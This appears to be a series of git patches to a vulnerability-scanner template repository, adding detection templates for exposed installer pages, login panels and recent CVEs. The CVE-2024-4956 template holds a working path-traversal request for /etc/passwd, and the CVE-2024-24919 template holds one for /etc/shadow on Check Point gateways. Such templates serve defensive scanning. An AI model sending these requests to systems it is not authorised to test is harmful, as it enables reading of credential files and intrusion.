no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-49070.yaml"} {"ID":"CVE-2023-49103","Info":{"Name":"OwnCloud - Phpinfo Configuration","Severity":"high","Description":"An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-49103.yaml"} @@ -2364,6 +2369,7 @@ {"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} +{"ID":"CVE-2024-21683","Info":{"Name":"Atlassian Confluence Data Center and Server - Remote Code Execution","Severity":"high","Description":"Detects a Remote Code Execution vulnerability in Confluence Data Center and Server versions prior to X.X (affected versions). This issue allows authenticated attackers to execute arbitrary code.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-21683.yaml"} {"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"} {"ID":"CVE-2024-21893","Info":{"Name":"Ivanti SAML - Server Side Request Forgery (SSRF)","Severity":"high","Description":"A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-21893.yaml"} {"ID":"CVE-2024-22024","Info":{"Name":"Ivanti Connect Secure - XXE","Severity":"high","Description":"Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-22024.yaml"} @@ -2406,9 +2412,11 @@ {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} +{"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} +{"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a8bbfdcf41..fdd7707641 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -2ecfbdb4298145f0427a7bc3f0ccd192 +55d726c9b235a4147824c1f516d6ede1 From 2bf00c43f17f52b5e8ee361725a7710ec8f29b20 Mon Sep 17 00:00:00 2001 From: Gunther Royen Date: Wed, 29 May 2024 11:02:41 +0200 Subject: [PATCH 447/847] enlarged traversal path, this is often not long enough --- http/cves/2024/CVE-2024-4956.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 2481ee7b18..8da26616b5 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -30,7 +30,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers: - type: dsl From 53031f2ab27f23f43d24b2afb477252e316114a8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 17:42:07 +0530 Subject: [PATCH 448/847] Create cubebackup-setup-installer.yaml --- .../cubebackup-setup-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/cubebackup-setup-installer.yaml diff --git a/http/misconfiguration/cubebackup-setup-installer.yaml b/http/misconfiguration/cubebackup-setup-installer.yaml new file mode 100644 index 0000000000..55b903fb1c --- /dev/null +++ b/http/misconfiguration/cubebackup-setup-installer.yaml @@ -0,0 +1,31 @@ +id: cubebackup-setup-installer + +info: + name: CubeBackup Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed CubeBackup Setup page. + reference: + - https://www.cubebackup.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="CubeBackup setup" + tags: misconfig,install,exposure,cubebackup + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "CubeBackup setup" + + - type: status + status: + - 200 From 9932f319513445bcc85483ee2d53ece8325d4c7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 15:04:01 +0000 Subject: [PATCH 450/847] Auto Generated Templates Checksum [Wed May 29 15:04:01 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1792f9bfa6..96efa4f5fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:cfc088634ae45324a8da7ad24935ca652af56005 -cves.json-checksum.txt:736f1e493b97aa3ed9087475630076e22ea04456 +cves.json:6eee1186277f72ac4416ed2435f40e2541bea763 +cves.json-checksum.txt:3eb64dc359a3fa01d30c701a2ad27aea9bb3b8bc dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3311,7 +3311,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b -http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 +http/cves/2024/CVE-2024-4956.yaml:d307ad589d80f512df4bfa2bc2f7f727eb32f050 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -8601,7 +8601,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aab4de2297091fcd9b0008bf2a1d84dcf4593c88 +templates-checksum.txt:696e9190411f7f7ecfff24945eade5e5c370d56a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3e953023cac97aeab39a02b8f93d4e09624eac3c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 29 May 2024 15:05:42 +0000 Subject: [PATCH 451/847] Auto Template Signing [Wed May 29 15:05:42 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4956.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 8da26616b5..8b34fb7f1f 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -39,4 +39,4 @@ http: - contains(header, "application/octet-stream") - status_code == 200 condition: and -# digest: 4b0a00483046022100d04cb6a8b4f715247f0046035995368961f1e380721d9a061a68fbcdf728ad70022100c807dbccfb625a6ee33ef8333433686a5a437f066cc9ecdd6c8a5aac4923bed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f3fc0d77fbae2962a5f1baf5b9986fc4abe4ea968b3898fec35782a662cb3fbf022020a1ce16cea9d0dcfd42f0b7fe6550ada932bec3e3c8e4774c9254046ac4dfa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 491263d9417aa880e0770af13326307153cd6e10 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 20:56:30 +0530 Subject: [PATCH 452/847] Create mura-cms-setup-installer.yaml --- .../installer/mura-cms-setup-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/mura-cms-setup-installer.yaml diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml new file mode 100644 index 0000000000..97a45a968f --- /dev/null +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -0,0 +1,31 @@ +id: mura-cms-setup-installer + +info: + name: Mura CMS Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Mura CMS Setup page. + reference: + - https://www.murasoftware.com/mura-cms/ + metadata: + verified: true + max-request: 1 + fofa-query: body="Mura CMS - Setup" + tags: misconfig,install,exposure,mura-cms + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Mura CMS - Setup" + + - type: status + status: + - 200 From efd82d182e2498f8f1a1e10ef6eaed1d58482ea1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 22:51:03 +0530 Subject: [PATCH 453/847] Create pandora-fms-installer.yaml --- .../installer/pandora-fms-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/pandora-fms-installer.yaml diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml new file mode 100644 index 0000000000..4592bf3ccc --- /dev/null +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -0,0 +1,31 @@ +id: pandora-fms-installer + +info: + name: Pandora FMS Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Pandora FMS installation page. + reference: + - https://pandorafms.com/en/ + metadata: + verified: true + max-request: 1 + fofa-query: body="Pandora FMS - Installation Wizard" + tags: misconfig,install,exposure,pandora-fms + +http: + - method: GET + path: + - "{{BaseURL}}/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Pandora FMS - Installation Wizard" + + - type: status + status: + - 200 From 644cc91b61f02bd049f86c00175cb8db38f2ebb5 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 19:24:43 +0200 Subject: [PATCH 454/847] Add files via upload --- .../oracle-access-management.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/exposed-panels/oracle-access-management.yaml diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml new file mode 100644 index 0000000000..5916c37753 --- /dev/null +++ b/http/exposed-panels/oracle-access-management.yaml @@ -0,0 +1,40 @@ +id: oracle-access-management + +info: + name: Oracle Access Management Login Panel - Detect + author: righettod + severity: info + description: Oracle Access Management login panel was detected. + classification: + cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.title:"Oracle Access Management" + vendor: oracle + verified: true + tags: panel,oracle,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/oam/pages/login.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Login - Oracle Access Management" + - "/oam/server/auth_cred_submit" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' \ No newline at end of file From c41de4bf893e88a9630a6bbaf9b9447f11ab5ed5 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 19:29:32 +0200 Subject: [PATCH 455/847] Add the reference entry --- http/exposed-panels/oracle-access-management.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index 5916c37753..eb34017120 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -5,6 +5,8 @@ info: author: righettod severity: info description: Oracle Access Management login panel was detected. + reference: + - https://www.oracle.com/security/identity-management/access-management/ classification: cpe: cpe:2.3:a:oracle:access_manager:*:*:*:*:*:*:*:* metadata: @@ -37,4 +39,4 @@ http: part: body group: 1 regex: - - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' \ No newline at end of file + - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' From 374338daa52164e0f72456837bb48eaf85c253ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:02:48 +0530 Subject: [PATCH 456/847] Create wowonder-installer.yaml --- .../installer/wowonder-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/wowonder-installer.yaml diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml new file mode 100644 index 0000000000..a038f43ab2 --- /dev/null +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -0,0 +1,31 @@ +id: wowonder-installer + +info: + name: WoWonder Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed WoWonder installation page. + reference: + - https://www.wowonder.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="WoWonder | Installation" + tags: misconfig,install,exposure,wowonder + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "WoWonder | Installation" + + - type: status + status: + - 200 From ab6ccf2b623178c5bc321617bb637f10cf5a2b29 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 19:56:37 +0200 Subject: [PATCH 457/847] Add files via upload --- http/exposed-panels/oracle-business-control.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index 38ac27fff1..52e2cbbe39 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -2,9 +2,11 @@ id: oracle-business-control info: name: Oracle Commerce Business Control Center Login Panel - Detect - author: dhiyaneshDk + author: dhiyaneshDk,righettod severity: info description: Oracle Commerce Business Control Center login panel was detected. + reference: + - https://docs.oracle.com/cd/E23095_01/Platform.93/ATGBCCAdminGuide/html/s0101introductiontotheatgbusinesscont01.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 @@ -20,14 +22,19 @@ http: - method: GET path: - '{{BaseURL}}/atg/bcc' + - '{{BaseURL}}/atg/user/html/login.jsp' + + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - 'Oracle Commerce Business Control Center' + - '/atg/userprofiling/InternalProfileFormHandler.loginSuccessURL' + - '/atg/userprofiling/InternalProfileFormHandler.loginErrorURL' + condition: or - type: status status: - 200 -# digest: 490a00463044022053e01b77ea1a1e685d1db0bf5c04bdd1ec7c937037c1f0a468192cfe1a0ce40e022027ac62488ae6b091b8ec611d2ea461fed923362a0d494718b77a4c1e75656ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8dafd9c15e6be2158bdd78da6fd8289f52cd8c04 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 20:04:14 +0200 Subject: [PATCH 458/847] Fix linter error --- http/exposed-panels/oracle-business-control.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index 52e2cbbe39..a9d286a7a3 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -23,7 +23,7 @@ http: path: - '{{BaseURL}}/atg/bcc' - '{{BaseURL}}/atg/user/html/login.jsp' - + stop-at-first-match: true matchers-condition: and From 650be8a0f2b226623f3c138b5b6b0918b8620518 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:37:39 +0530 Subject: [PATCH 459/847] Create call-com-installer.yaml --- .../installer/call-com-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/call-com-installer.yaml diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml new file mode 100644 index 0000000000..f704504891 --- /dev/null +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -0,0 +1,31 @@ +id: call-com-installer + +info: + name: Call.com Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Call.com Setup page. + reference: + - https://cal.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="Setup | Cal.com" + tags: misconfig,install,exposure,cal + +http: + - method: GET + path: + - "{{BaseURL}}/auth/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Setup | Cal.com" + + - type: status + status: + - 200 From 9c4ac9fc42d2bd2e144cfc3205a69a4933c97791 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:40:27 +0530 Subject: [PATCH 460/847] added negative matcher --- http/misconfiguration/installer/call-com-installer.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index f704504891..065ca347a8 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -26,6 +26,12 @@ http: words: - "Setup | Cal.com" + - type: word + part: body + words: + - "You have already created an administrator user" + negative: true + - type: status status: - 200 From f7fc77cb5f192e4ecd529811b0a93e6a4b944105 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:45:07 +0530 Subject: [PATCH 461/847] minor update --- http/misconfiguration/installer/call-com-installer.yaml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index 065ca347a8..75c0bb2f99 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -25,12 +25,8 @@ http: part: body words: - "Setup | Cal.com" - - - type: word - part: body - words: - - "You have already created an administrator user" - negative: true + - "Minimum 15 characters long" + condition: and - type: status status: From 7a463330805e431e2c807163ace941d8871b9055 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 30 May 2024 02:54:11 +0530 Subject: [PATCH 462/847] Update CVE-2021-29625.yaml --- http/cves/2021/CVE-2021-29625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 8d1ab155a5..178b6cad21 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: adminer product: adminer - tags: cve2021,cve,adminer,xss,sqli + tags: cve2021,cve,adminer,xss http: - method: GET @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950 From f9640348105ee0d858e6be1701cfff3b03de2e9e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 30 May 2024 02:55:41 +0530 Subject: [PATCH 463/847] Update CVE-2023-3345.yaml --- http/cves/2023/CVE-2023-3345.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 2d92d84f95..5fdc791a55 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -29,7 +29,7 @@ info: vendor: masteriyo product: masteriyo framework: wordpress - tags: cve2023,cve,wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo + tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo http: - raw: @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 From c226ece895c8e4e6aec22aff66f21e5b8b70e08e Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 00:36:42 -0300 Subject: [PATCH 464/847] Create CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24919.yaml diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml new file mode 100644 index 0000000000..2571e44fcf --- /dev/null +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -0,0 +1,29 @@ +id: CVE-2024-24919 + +info: + name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion + author: johnk3r + severity: medium + metadata: + max-request: 1 + vendor: checkpoint + tags: cve,cve2024,checkpoint + +http: + - method: POST + path: + - "{{BaseURL}}/clients/MyCRL" + + body: 'aCSHELL/../../../../../../../etc/shadow' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:" + - "cpep_user:" + + - type: status + status: + - 200 From 03e7aa0bc8bc618af629073ce6e9bf9bc7a353cd Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 00:38:13 -0300 Subject: [PATCH 465/847] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 2571e44fcf..9dc5043337 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -1,7 +1,7 @@ id: CVE-2024-24919 info: - name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion + name: CVE-2024-24919 author: johnk3r severity: medium 